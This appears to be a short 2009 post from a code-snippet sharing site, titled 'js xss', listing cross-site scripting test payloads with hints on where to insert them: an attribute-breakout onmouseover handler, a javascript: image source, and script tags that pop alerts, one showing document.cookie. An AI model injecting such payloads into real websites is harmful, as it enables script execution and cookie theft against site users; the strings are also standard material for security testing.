advanced code snippet search
savintsev on 05/25/09
js xss
05/25/09 03:11am05/25/09 03:10am
1 person have marked this snippet as a favorite
vali29
" onmouseover="alert('hacker')" <!-- in email or url field --> <image src=javascript:alert('ok')> <!-- in textarea --> <script>alert('Hacking by hacker')</script> <script>alert(document.cookie)</script>
Report this snippet Tweet
Comment:
You need to login to post a comment.